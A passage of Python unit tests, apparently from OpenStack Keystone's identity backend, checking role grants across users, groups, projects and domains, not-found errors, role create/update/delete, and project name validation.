def test_get_roles_for_user_and_domain_404(self):
""" Test errors raised when getting roles for user on a domain.
Test Plan:
- Check non-existing user gives UserNotFound
- Check non-existing domain gives DomainNotFound
"""
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_api.create_user(new_user1['id'], new_user1)
self.assertRaises(exception.UserNotFound,
self.identity_api.get_roles_for_user_and_domain,
uuid.uuid4().hex,
new_domain['id'])
self.assertRaises(exception.DomainNotFound,
self.identity_api.get_roles_for_user_and_domain,
new_user1['id'],
uuid.uuid4().hex)
def test_get_roles_for_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_roles_for_user_and_project,
uuid.uuid4().hex,
self.tenant_bar['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.get_roles_for_user_and_project,
self.user_foo['id'],
uuid.uuid4().hex)
def test_add_role_to_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.add_role_to_user_and_project,
uuid.uuid4().hex,
self.tenant_bar['id'],
self.role_admin['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
uuid.uuid4().hex,
self.role_admin['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.add_role_to_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
uuid.uuid4().hex)
def test_remove_role_from_user_and_project(self):
self.identity_api.add_role_to_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
self.identity_api.remove_role_from_user_and_project(
self.user_foo['id'], self.tenant_bar['id'], 'member')
roles_ref = self.identity_api.get_roles_for_user_and_project(
self.user_foo['id'], self.tenant_bar['id'])
self.assertNotIn('member', roles_ref)
self.assertRaises(exception.NotFound,
self.identity_api.remove_role_from_user_and_project,
self.user_foo['id'],
self.tenant_bar['id'],
'member')
def test_get_role_grant_by_user_and_project(self):
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id=self.role_admin['id'])
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
self.assertIn(self.role_admin['id'],
[role_ref['id'] for role_ref in roles_ref])
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'])
        roles_ref_ids = [ref['id'] for ref in roles_ref]
self.assertIn(self.role_admin['id'], roles_ref_ids)
self.assertIn('member', roles_ref_ids)
def test_get_role_grants_for_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=uuid.uuid4().hex,
project_id=self.tenant_bar['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.list_grants,
user_id=self.user_foo['id'],
project_id=uuid.uuid4().hex)
def test_add_role_grant_to_user_and_project_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.create_grant,
user_id=uuid.uuid4().hex,
project_id=self.tenant_bar['id'],
role_id=self.role_admin['id'])
self.assertRaises(exception.ProjectNotFound,
self.identity_api.create_grant,
user_id=self.user_foo['id'],
project_id=uuid.uuid4().hex,
role_id=self.role_admin['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.create_grant,
user_id=self.user_foo['id'],
project_id=self.tenant_bar['id'],
role_id=uuid.uuid4().hex)
def test_remove_role_grant_from_user_and_project(self):
self.identity_api.create_grant(user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=self.user_foo['id'],
project_id=self.tenant_baz['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_project(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': 'secret', 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
project_id=self.tenant_bar['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
project_id=self.tenant_bar['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_domain(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_group = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_correct_role_grant_from_a_mix(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_project = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': new_domain['id']}
self.identity_man.create_project({}, new_project['id'], new_project)
new_group = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group['id'], new_group)
new_group2 = {'id': uuid.uuid4().hex, 'domain_id': new_domain['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, new_group2['id'], new_group2)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
new_user2 = {'id': uuid.uuid4().hex, 'name': 'new_user2',
'password': uuid.uuid4().hex, 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user2['id'], new_user2)
self.identity_api.add_user_to_group(new_user['id'],
new_group['id'])
# First check we have no grants
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
# Now add the grant we are going to test for, and some others as
# well just to make sure we get back the right one
self.identity_api.create_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
self.identity_api.create_grant(group_id=new_group2['id'],
domain_id=new_domain['id'],
role_id=self.role_admin['id'])
self.identity_api.create_grant(user_id=new_user2['id'],
domain_id=new_domain['id'],
role_id=self.role_admin['id'])
self.identity_api.create_grant(group_id=new_group['id'],
project_id=new_project['id'],
role_id=self.role_admin['id'])
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
group_id=new_group['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=new_group['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_role_grant_by_user_and_domain(self):
new_domain = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(new_domain['id'], new_domain)
new_user = {'id': uuid.uuid4().hex, 'name': 'new_user',
'password': 'secret', 'enabled': True,
'domain_id': new_domain['id']}
self.identity_man.create_user({}, new_user['id'], new_user)
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertDictEqual(roles_ref[0], self.role_member)
self.identity_api.delete_grant(user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
roles_ref = self.identity_api.list_grants(
user_id=new_user['id'],
domain_id=new_domain['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=new_user['id'],
domain_id=new_domain['id'],
role_id='member')
def test_get_and_remove_role_grant_by_group_and_cross_domain(self):
group1_domain1_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(group1_domain1_role['id'],
group1_domain1_role)
group1_domain2_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(group1_domain2_role['id'],
group1_domain2_role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group1 = {'id': uuid.uuid4().hex, 'domain_id': domain1['id'],
'name': uuid.uuid4().hex}
self.identity_man.create_group({}, group1['id'], group1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 0)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=group1_domain1_role['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertDictEqual(roles_ref[0], group1_domain1_role)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertDictEqual(roles_ref[0], group1_domain2_role)
self.identity_api.delete_grant(group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
group_id=group1['id'],
domain_id=domain2['id'],
role_id=group1_domain2_role['id'])
def test_get_and_remove_role_grant_by_user_and_cross_domain(self):
user1_domain1_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(user1_domain1_role['id'],
user1_domain1_role)
user1_domain2_role = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex}
self.identity_api.create_role(user1_domain2_role['id'],
user1_domain2_role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 0)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=user1_domain1_role['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertDictEqual(roles_ref[0], user1_domain1_role)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertDictEqual(roles_ref[0], user1_domain2_role)
self.identity_api.delete_grant(user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain2['id'])
self.assertEquals(len(roles_ref), 0)
self.assertRaises(exception.NotFound,
self.identity_api.delete_grant,
user_id=user1['id'],
domain_id=domain2['id'],
role_id=user1_domain2_role['id'])
def test_role_grant_by_group_and_cross_domain_project(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
role2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role2['id'], role2)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain2['id']}
self.identity_man.create_project({}, project1['id'], project1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role2['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
        roles_ref_ids = [ref['id'] for ref in roles_ref]
self.assertIn(role1['id'], roles_ref_ids)
self.assertIn(role2['id'], roles_ref_ids)
self.identity_api.delete_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
self.assertDictEqual(roles_ref[0], role2)
def test_role_grant_by_user_and_cross_domain_project(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
role2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role2['id'], role2)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
domain2 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain2['id'], domain2)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain2['id']}
self.identity_man.create_project({}, project1['id'], project1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role2['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
        roles_ref_ids = [ref['id'] for ref in roles_ref]
self.assertIn(role1['id'], roles_ref_ids)
self.assertIn(role2['id'], roles_ref_ids)
self.identity_api.delete_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
self.assertDictEqual(roles_ref[0], role2)
def test_multi_role_grant_by_user_group_on_project_domain(self):
role_list = []
for _ in range(8):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
role_list.append(role)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
self.identity_api.add_user_to_group(user1['id'],
group1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 0)
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role_list[0]['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role_list[1]['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role_list[2]['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role_list[3]['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role_list[4]['id'])
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role_list[5]['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role_list[6]['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role_list[7]['id'])
roles_ref = self.identity_api.list_grants(user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[0], roles_ref)
self.assertIn(role_list[1], roles_ref)
roles_ref = self.identity_api.list_grants(group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[2], roles_ref)
self.assertIn(role_list[3], roles_ref)
roles_ref = self.identity_api.list_grants(user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[4], roles_ref)
self.assertIn(role_list[5], roles_ref)
roles_ref = self.identity_api.list_grants(group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 2)
self.assertIn(role_list[6], roles_ref)
self.assertIn(role_list[7], roles_ref)
def test_delete_role_with_user_and_group_grants(self):
raise nose.exc.SkipTest('Blocked by bug 1097472')
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.delete_role(role1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
project_id=project1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
project_id=project1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
domain_id=domain1['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
domain_id=domain1['id'])
def test_delete_user_with_group_project_domain_links(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(user_id=user1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(user_id=user1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
user_id=user1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.check_user_in_group(
user_id=user1['id'],
group_id=group1['id'])
self.identity_api.delete_user(user1['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
project_id=project1['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.list_grants,
user_id=user1['id'],
domain_id=domain1['id'])
self.assertRaises(exception.NotFound,
self.identity_api.check_user_in_group,
user1['id'],
group1['id'])
def test_delete_group_with_user_project_domain_links(self):
role1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role1['id'], role1)
domain1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_domain(domain1['id'], domain1)
project1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id']}
self.identity_man.create_project({}, project1['id'], project1)
user1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'password': uuid.uuid4().hex,
'enabled': True}
self.identity_man.create_user({}, user1['id'], user1)
group1 = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex,
'domain_id': domain1['id'], 'enabled': True}
self.identity_man.create_group({}, group1['id'], group1)
self.identity_api.create_grant(group_id=group1['id'],
project_id=project1['id'],
role_id=role1['id'])
self.identity_api.create_grant(group_id=group1['id'],
domain_id=domain1['id'],
role_id=role1['id'])
self.identity_api.add_user_to_group(user_id=user1['id'],
group_id=group1['id'])
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
project_id=project1['id'])
self.assertEquals(len(roles_ref), 1)
roles_ref = self.identity_api.list_grants(
group_id=group1['id'],
domain_id=domain1['id'])
self.assertEquals(len(roles_ref), 1)
self.identity_api.check_user_in_group(
user_id=user1['id'],
group_id=group1['id'])
self.identity_api.delete_group(group1['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
project_id=project1['id'])
self.assertRaises(exception.GroupNotFound,
self.identity_api.list_grants,
group_id=group1['id'],
domain_id=domain1['id'])
self.identity_api.get_user(user1['id'])
def test_delete_domain_with_user_group_project_links(self):
        # TODO(chungg): add test case once expected behaviour defined
pass
def test_role_crud(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.identity_api.create_role(role['id'], role)
role_ref = self.identity_api.get_role(role['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, role)
role['name'] = uuid.uuid4().hex
self.identity_api.update_role(role['id'], role)
role_ref = self.identity_api.get_role(role['id'])
role_ref_dict = dict((x, role_ref[x]) for x in role_ref)
self.assertDictEqual(role_ref_dict, role)
self.identity_api.delete_role(role['id'])
self.assertRaises(exception.RoleNotFound,
self.identity_api.get_role,
role['id'])
def test_update_role_404(self):
role = {'id': uuid.uuid4().hex, 'name': uuid.uuid4().hex}
self.assertRaises(exception.RoleNotFound,
self.identity_api.update_role,
role['id'],
role)
def test_add_user_to_project(self):
self.identity_api.add_user_to_project(self.tenant_baz['id'],
self.user_foo['id'])
tenants = self.identity_api.get_projects_for_user(self.user_foo['id'])
self.assertIn(self.tenant_baz['id'], tenants)
def test_add_user_to_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.add_user_to_project,
uuid.uuid4().hex,
self.user_foo['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.add_user_to_project,
self.tenant_bar['id'],
uuid.uuid4().hex)
def test_remove_user_from_project(self):
self.identity_api.add_user_to_project(self.tenant_baz['id'],
self.user_foo['id'])
self.identity_api.remove_user_from_project(self.tenant_baz['id'],
self.user_foo['id'])
tenants = self.identity_api.get_projects_for_user(self.user_foo['id'])
self.assertNotIn(self.tenant_baz['id'], tenants)
def test_remove_user_from_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.remove_user_from_project,
uuid.uuid4().hex,
self.user_foo['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.remove_user_from_project,
self.tenant_bar['id'],
uuid.uuid4().hex)
self.assertRaises(exception.NotFound,
self.identity_api.remove_user_from_project,
self.tenant_baz['id'],
self.user_foo['id'])
def test_get_projects_for_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
uuid.uuid4().hex)
def test_update_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.update_project,
uuid.uuid4().hex,
dict())
def test_delete_project_404(self):
self.assertRaises(exception.ProjectNotFound,
self.identity_api.delete_project,
uuid.uuid4().hex)
def test_update_user_404(self):
user_id = uuid.uuid4().hex
self.assertRaises(exception.UserNotFound,
self.identity_api.update_user,
user_id,
{'id': user_id})
def test_delete_user_with_project_association(self):
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_user_to_project(self.tenant_bar['id'],
user['id'])
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
user['id'])
def test_delete_user_with_project_roles(self):
user = {'id': uuid.uuid4().hex,
'name': uuid.uuid4().hex,
'domain_id': DEFAULT_DOMAIN_ID,
'password': uuid.uuid4().hex}
self.identity_api.create_user(user['id'], user)
self.identity_api.add_role_to_user_and_project(
user['id'],
self.tenant_bar['id'],
self.role_member['id'])
self.identity_api.delete_user(user['id'])
self.assertRaises(exception.UserNotFound,
self.identity_api.get_projects_for_user,
user['id'])
def test_delete_user_404(self):
self.assertRaises(exception.UserNotFound,
self.identity_api.delete_user,
uuid.uuid4().hex)
def test_delete_role_404(self):
self.assertRaises(exception.RoleNotFound,
self.identity_api.delete_role,
uuid.uuid4().hex)
def test_create_project_long_name_fails(self):
tenant = {'id': 'fake1', 'name': 'a' * 65,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_create_project_blank_name_fails(self):
tenant = {'id': 'fake1', 'name': '',
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
tenant['id'],
tenant)
def test_create_project_invalid_name_fails(self):
tenant = {'id': 'fake1', 'name': None,
'domain_id': DEFAULT_DOMAIN_ID}
self.assertRaises(exception.ValidationError,
self.identity_man.create_project, {},
